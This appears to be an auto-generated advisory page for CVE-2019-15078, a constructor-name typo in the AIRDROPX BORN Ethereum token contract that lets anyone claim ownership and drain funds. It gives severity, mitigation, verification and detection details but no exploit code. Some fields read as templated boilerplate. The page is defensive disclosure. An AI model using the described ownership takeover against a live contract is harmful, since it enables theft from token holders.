CVE-2019-15078 – A typo in the constructor name of the AIRDROPX ... (How to Fix)

Q: What is the severity of CVE-2019-15078?

CVE-2019-15078 has a CVSS score of 7.5 (HIGH). A typo in the constructor name of the AIRDROPX BORN Ethereum smart contract allows attackers to become contract owners and steal cryptocurrency. This affects anyone holding or transacting with this specific token contract deployed before the fix. The vulnerability stems from case sensitivity in Solidity function names.

📋 TL;DR

A typo in the constructor name of the AIRDROPX BORN Ethereum smart contract allows attackers to become contract owners and steal cryptocurrency. This affects anyone holding or transacting with this specific token contract deployed before the fix. The vulnerability stems from case sensitivity in Solidity function names.

💻 Affected Systems

Products:

AIRDROPX BORN Ethereum token smart contract

Versions: All deployments through 2019-05-29

Operating Systems: N/A - Smart contract vulnerability

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects specific contract deployments with the typo. Not a vulnerability in Ethereum itself or other tokens.

📦 What is this software?

Xbornid by Xbornid

View all CVEs affecting Xbornid →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete loss of all cryptocurrency held in the contract, attacker gains full control to drain funds and modify contract behavior.

🟠

Likely Case

Attacker claims contract ownership and steals available cryptocurrency, rendering the token worthless for legitimate holders.

🟢

If Mitigated

No impact if contract has been replaced with corrected version before exploitation.

🌐 Internet-Facing: HIGH - Ethereum smart contracts are inherently internet-facing and publicly accessible.

🏢 Internal Only: LOW - This is a public blockchain vulnerability, not an internal network issue.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires basic Ethereum transaction knowledge. The typo allows anyone to call the incorrectly named constructor.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Contracts deployed after 2019-05-29 with corrected constructor name

Vendor Advisory: https://github.com/smsecgroup/SM-VUL/tree/master/typo-vul-00

Restart Required: No

Instructions:

1. Deploy new contract with correct constructor name (XBORNID). 2. Migrate all token holders to new contract. 3. Abandon vulnerable contract. Note: Smart contracts are immutable once deployed.

🔧 Temporary Workarounds

Contract migration

all

Create new corrected contract and transfer all holdings

N/A - Requires manual smart contract deployment

🧯 If You Can't Patch

Immediately stop using the vulnerable token for transactions
Monitor contract for unauthorized ownership changes and alert holders

🔍 How to Verify

Check if Vulnerable:

Inspect contract source code for constructor name 'XBornID' instead of 'XBORNID'

Check Version:

Check contract deployment date and constructor signature on Etherscan

Verify Fix Applied:

Verify new contract has correct constructor name and ownership is properly set

📡 Detection & Monitoring

Log Indicators:

Unexpected contract ownership transfer events
Unauthorized constructor calls

Network Indicators:

Transactions calling the incorrect constructor function

SIEM Query:

Ethereum event monitoring for contract OwnershipTransferred events from vulnerable address

📊 Metadata

CVE ID: CVE-2019-15078

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Published: December 30, 2020

Last Updated: November 21, 2024

🔗 References

https://github.com/smsecgroup/SM-VUL/tree/master/typo-vul-00 Exploit,Third Party Advisory
https://github.com/smsecgroup/SM-VUL/tree/master/typo-vul-00 Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON